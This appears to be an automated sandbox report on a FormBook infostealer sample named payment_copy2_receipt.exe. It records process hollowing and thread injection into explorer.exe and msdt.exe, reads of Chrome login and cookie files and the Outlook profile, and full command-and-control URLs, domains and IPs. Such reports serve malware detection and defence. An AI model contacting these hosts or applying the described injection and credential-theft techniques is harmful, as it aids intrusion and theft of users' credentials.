          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A816E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B28ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A836CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A98EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B0FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A5E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B0FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A5C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A5C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A5C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A88E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B11608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A6766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A67E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B1AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B1AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A68794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AD7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A937F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A54F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A54F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7B73D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A8A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A7F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AEFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00AEFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B2070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B2070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A6FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00B28F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_00A6EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPort
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 3_2_0040C327 LdrLoadDll,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_0040AA91 SetUnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_0040AD6C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_0040A932 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_0040F6B0 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeDomain query: www.bem4u.shop
          Source: C:\Windows\explorer.exeDomain query: www.030332.com
          Source: C:\Windows\explorer.exeDomain query: www.vnsuda.lol
          Source: C:\Windows\explorer.exeDomain query: www.stephapproved.com
          Source: C:\Windows\explorer.exeNetwork Connect: 75.2.115.196 80
          Source: C:\Windows\explorer.exeNetwork Connect: 70.32.23.81 80
          Source: C:\Windows\explorer.exeNetwork Connect: 34.110.163.134 80
          Source: C:\Windows\explorer.exeDomain query: www.coolfashionshop.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 103.100.208.243 80
          Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80
          Sample uses process hollowing technique
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: AF0000
          Maps a DLL or memory area into another process
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\fcvvthv.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeThread APC queued: target process: C:\Windows\explorer.exe
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeThread register set: target process: 3320
          Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3320
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeProcess created: C:\Users\user\AppData\Local\Temp\fcvvthv.exe "C:\Users\user~1\AppData\Local\Temp\fcvvthv.exe" C:\Users\user~1\AppData\Local\Temp\abggklv.q
          Source: explorer.exe, 00000004.00000000.301643615.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.331730864.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.261001669.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000004.00000000.310535687.0000000007B83000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.301643615.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.331730864.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.300903726.00000000004C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000004.00000000.301643615.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.331730864.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.301643615.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.331730864.0000000000B10000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000004.00000000.261001669.0000000000B10000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_0040ABAB cpuid
          Source: C:\Users\user\AppData\Local\Temp\fcvvthv.exeCode function: 1_2_0040A81B GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
          Source: C:\Users\user\Desktop\payment_copy2_receipt.exeCode function: 0_2_0040324F EntryPoint,SetErrorMode,GetVersion,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

          Stealing of Sensitive Information

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Tries to steal Mail credentials (via file / registry access)
          Source: C:\Windows\SysWOW64\msdt.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
          Tries to harvest and steal browser information (history, passwords, etc)
          Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
          Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
          Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
          Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
          Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
          Source: C:\Windows\SysWOW64\msdt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies

          Remote Access Functionality

          barindex
          Yara detected FormBook
          Source: Yara matchFile source: 3.2.fcvvthv.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.fcvvthv.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000004.00000000.325650949.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.359853836.0000000000590000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000000.346266084.0000000010833000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.359518413.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.511854838.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.508172030.0000000000760000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.360011022.00000000006F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.511779339.00000000046B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid Accounts2
          Command and Scripting Interpreter          		Path Interception512
          Process Injection          		1
          Virtualization/Sandbox Evasion          		1
          OS Credential Dumping          		1
          System Time Discovery          		Remote Services1
          Email Collection          		Exfiltration Over Other Network Medium1
          Encrypted Channel          		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
          System Shutdown/Reboot
          Default Accounts1
          Native API          		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts512
          Process Injection          		21
          Input Capture          		141
          Security Software Discovery          		Remote Desktop Protocol21
          Input Capture          		Exfiltration Over Bluetooth3
          Ingress Tool Transfer          		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain Accounts1
          Shared Modules          		Logon Script (Windows)Logon Script (Windows)1
          Deobfuscate/Decode Files or Information          		Security Account Manager1
          Virtualization/Sandbox Evasion          		SMB/Windows Admin Shares1
          Archive Collected Data          		Automated Exfiltration4
          Non-Application Layer Protocol          		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)2
          Obfuscated Files or Information          		NTDS2
          Process Discovery          		Distributed Component Object Model1
          Data from Local System          		Scheduled Transfer114
          Application Layer Protocol          		SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
          Remote System Discovery          		SSH2
          Clipboard Data          		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain Credentials2
          File and Directory Discovery          		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync15
          System Information Discovery          		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 756109 Sample: payment_copy2_receipt.exe Startdate: 29/11/2022 Architecture: WINDOWS Score: 100 32 www.kahrabaonline.com 2->32 48 Malicious sample detected (through community Yara rule) 2->48 50 Antivirus detection for URL or domain 2->50 52 Multi AV Scanner detection for submitted file 2->52 54 3 other signatures 2->54 10 payment_copy2_receipt.exe 19 2->10         started        signatures3 process4 file5 28 C:\Users\user\AppData\Local\...\nssAD55.tmp, COM 10->28 dropped 30 C:\Users\user\AppData\Local\...\fcvvthv.exe, PE32 10->30 dropped 13 fcvvthv.exe 1 10->13         started        process6 signatures7 68 Multi AV Scanner detection for dropped file 13->68 70 Machine Learning detection for dropped file 13->70 72 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 13->72 74 Maps a DLL or memory area into another process 13->74 16 fcvvthv.exe 13->16         started        19 conhost.exe 13->19         started        process8 signatures9 40 Modifies the context of a thread in another process (thread injection) 16->40 42 Maps a DLL or memory area into another process 16->42 44 Sample uses process hollowing technique 16->44 46 Queues an APC in another process (thread injection) 16->46 21 explorer.exe 16->21 injected process10 dnsIp11 34 58777.zhanghonghong.com 103.100.208.243, 49712, 80 HKKFGL-AS-APHKKwaifongGroupLimitedHK Hong Kong 21->34 36 bem4u.shop 2.57.90.16, 49720, 49721, 80 AS-HOSTINGERLT Lithuania 21->36 38 6 other IPs or domains 21->38 56 System process connects to network (likely due to code injection or exploit) 21->56 58 Performs DNS queries to domains with low reputation 21->58 25 msdt.exe 13 21->25         started        signatures12 process13 signatures14 60 Tries to steal Mail credentials (via file / registry access) 25->60 62 Tries to harvest and steal browser information (history, passwords, etc) 25->62 64 Modifies the context of a thread in another process (thread injection) 25->64 66 Maps a DLL or memory area into another process 25->66

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          payment_copy2_receipt.exe54%ReversingLabsWin32.Trojan.Injuke
          payment_copy2_receipt.exe38%VirustotalBrowse

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\fcvvthv.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Temp\fcvvthv.exe54%ReversingLabsWin32.Trojan.FormBook
          C:\Users\user\AppData\Local\Temp\nssAD55.tmp0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          1.2.fcvvthv.exe.21d0000.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          3.2.fcvvthv.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          0.0.payment_copy2_receipt.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File
          3.0.fcvvthv.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
          0.2.payment_copy2_receipt.exe.400000.0.unpack100%AviraHEUR/AGEN.1223491Download File

          Domains

          SourceDetectionScannerLabelLink
          stephapproved.com4%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.bem4u.shop/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=4D+PWXbgB4ogRjX6fs5PVj0HGmRsMlLoTFn3Q8gXNZCg8eDi41xcCT+RlNqelGXbdrjEsGoLW5hhUyw4icMG9EbpTIbOIKjETxFqhNsrxI+v100%Avira URL Cloudmalware
          http://www.030332.com/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=0RH+IT1kuvDJ9rkRmbuuDnrdLgu65XozQ/JOR96kX/EhF1f6QwJsxyvJPVJiAwnUlpNMH3LUUfaqGrsuBUI8TtociOaij3z8Rf/PV9bGuXJT100%Avira URL Cloudmalware
          http://www.vnsuda.lol/veh0/?V8Olq=H0phgvfvKBma6gvwGBFiiA3aGB6x1tx+qpMzsOKL6mX4XVya54sThvMqL7EFeUWxYIJWwwUJaARTNC9BUuxdalfssqJOBdyR5lth/WdqURqv&3fiPC=E4O8TXhX80iDs100%Avira URL Cloudmalware
          https://www.coolfashionshop.xyz/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=93LycRjWm4awEovVXWVYV100%Avira URL Cloudmalware
          http://www.stephapproved.com/veh0/?V8Olq=q2CkvjiufJAT9gG6R5hbib10Rbp6AiWeTKlSfCVYrUP+9/ZMp3UrZ4LyF/rVbhnSgdA59VnFYN1kGAwfQYzsaV6Pz6DbznSGjFMnhMTfrtcq&3fiPC=E4O8TXhX80iDs100%Avira URL Cloudmalware
          http://www.coolfashionshop.xyz/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=93LycRjWm4awEovVXWVYV+IJ3Jb7LKwjIdA7aRwoOX2ozYkISvzNjnqis/EaaxX4GW2e5S3JGCYnv5+dQS5WAoQqcporDra+I+tXDBzdj1sM100%Avira URL Cloudmalware
          http://www.bem4u.shop/veh0/100%Avira URL Cloudmalware
          http://www.vnsuda.lol/veh0/100%Avira URL Cloudmalware
          http://www.coolfashionshop.xyz/veh0/100%Avira URL Cloudmalware
          www.projectlis.online/veh0/100%Avira URL Cloudmalware
          http://www.stephapproved.com/veh0/100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          stephapproved.com
          		70.32.23.81
          		truetrueunknown
          58777.zhanghonghong.com
          		103.100.208.243
          		truetrue
            		unknown
            www.vnsuda.lol
            		75.2.115.196
            		truetrue
              		unknown
              www.coolfashionshop.xyz
              		34.110.163.134
              		truefalse
                		unknown
                bem4u.shop
                		2.57.90.16
                		truetrue
                  		unknown
                  www.kahrabaonline.com
                  		160.121.219.144
                  		truefalse
                    		unknown
                    www.bem4u.shop
                    		unknown
                    		unknowntrue
                      		unknown
                      www.030332.com
                      		unknown
                      		unknowntrue
                        		unknown
                        www.stephapproved.com
                        		unknown
                        		unknowntrue
                          		unknown

                          Contacted URLs

                          NameMaliciousAntivirus DetectionReputation
                          http://www.stephapproved.com/veh0/true
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.stephapproved.com/veh0/?V8Olq=q2CkvjiufJAT9gG6R5hbib10Rbp6AiWeTKlSfCVYrUP+9/ZMp3UrZ4LyF/rVbhnSgdA59VnFYN1kGAwfQYzsaV6Pz6DbznSGjFMnhMTfrtcq&3fiPC=E4O8TXhX80iDstrue
                          • Avira URL Cloud: malware
                          		unknown
                          www.projectlis.online/veh0/true
                          • Avira URL Cloud: malware
                          		low
                          http://www.bem4u.shop/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=4D+PWXbgB4ogRjX6fs5PVj0HGmRsMlLoTFn3Q8gXNZCg8eDi41xcCT+RlNqelGXbdrjEsGoLW5hhUyw4icMG9EbpTIbOIKjETxFqhNsrxI+vtrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.vnsuda.lol/veh0/?V8Olq=H0phgvfvKBma6gvwGBFiiA3aGB6x1tx+qpMzsOKL6mX4XVya54sThvMqL7EFeUWxYIJWwwUJaARTNC9BUuxdalfssqJOBdyR5lth/WdqURqv&3fiPC=E4O8TXhX80iDstrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.vnsuda.lol/veh0/true
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.030332.com/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=0RH+IT1kuvDJ9rkRmbuuDnrdLgu65XozQ/JOR96kX/EhF1f6QwJsxyvJPVJiAwnUlpNMH3LUUfaqGrsuBUI8TtociOaij3z8Rf/PV9bGuXJTtrue
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.bem4u.shop/veh0/true
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.coolfashionshop.xyz/veh0/false
                          • Avira URL Cloud: malware
                          		unknown
                          http://www.coolfashionshop.xyz/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=93LycRjWm4awEovVXWVYV+IJ3Jb7LKwjIdA7aRwoOX2ozYkISvzNjnqis/EaaxX4GW2e5S3JGCYnv5+dQS5WAoQqcporDra+I+tXDBzdj1sMfalse
                          • Avira URL Cloud: malware
                          		unknown

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabmsdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.drfalse
                            		high
                            https://www.coolfashionshop.xyz/veh0/?3fiPC=E4O8TXhX80iDs&V8Olq=93LycRjWm4awEovVXWVYVmsdt.exe, 0000000C.00000002.514187588.000000000553A000.00000004.10000000.00040000.00000000.sdmpfalse
                            • Avira URL Cloud: malware
                            		unknown
                            https://duckduckgo.com/ac/?q=n5335GITL.12.drfalse
                              		high
                              https://cdn.ecosia.org/assets/images/ico/fPmsdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://www.google.com/images/branding/product/ico/googleg_lodp.icomsdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.drfalse
                                  		high
                                  https://www.ecosia.org/search?q=msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://search.yahoo.com?fr=crmas_sfpfmsdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.drfalse
                                      		high
                                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=n5335GITL.12.drfalse
                                        		high
                                        https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchmsdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.drfalse
                                          		high
                                          http://nsis.sf.net/NSIS_ErrorErrorpayment_copy2_receipt.exefalse
                                            		high
                                            https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=msdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.drfalse
                                              		high
                                              https://ac.ecosia.org/autocomplete?q=n5335GITL.12.drfalse
                                                		high
                                                https://search.yahoo.com?fr=crmas_sfpmsdt.exe, 0000000C.00000002.511513709.0000000002D6E000.00000004.00000020.00020000.00000000.sdmp, n5335GITL.12.drfalse
                                                  		high
                                                  http://nsis.sf.net/NSIS_Errorpayment_copy2_receipt.exefalse
                                                    		high
                                                    https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=n5335GITL.12.drfalse
                                                      		high

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      75.2.115.196
                                                      		www.vnsuda.lolUnited States
                                                      		16509AMAZON-02UStrue
                                                      70.32.23.81
                                                      		stephapproved.comUnited States
                                                      		55293A2HOSTINGUStrue
                                                      34.110.163.134
                                                      		www.coolfashionshop.xyzUnited States
                                                      		15169GOOGLEUSfalse
                                                      103.100.208.243
                                                      		58777.zhanghonghong.comHong Kong
                                                      		133115HKKFGL-AS-APHKKwaifongGroupLimitedHKtrue
                                                      2.57.90.16
                                                      		bem4u.shopLithuania
                                                      		47583AS-HOSTINGERLTtrue

                                                      General Information

                                                      Joe Sandbox Version:36.0.0 Rainbow Opal
                                                      Analysis ID:756109
                                                      Start date and time:2022-11-29 16:41:08 +01:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 9m 23s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Sample file name:payment_copy2_receipt.exe
                                                      Cookbook file name:default.jbs
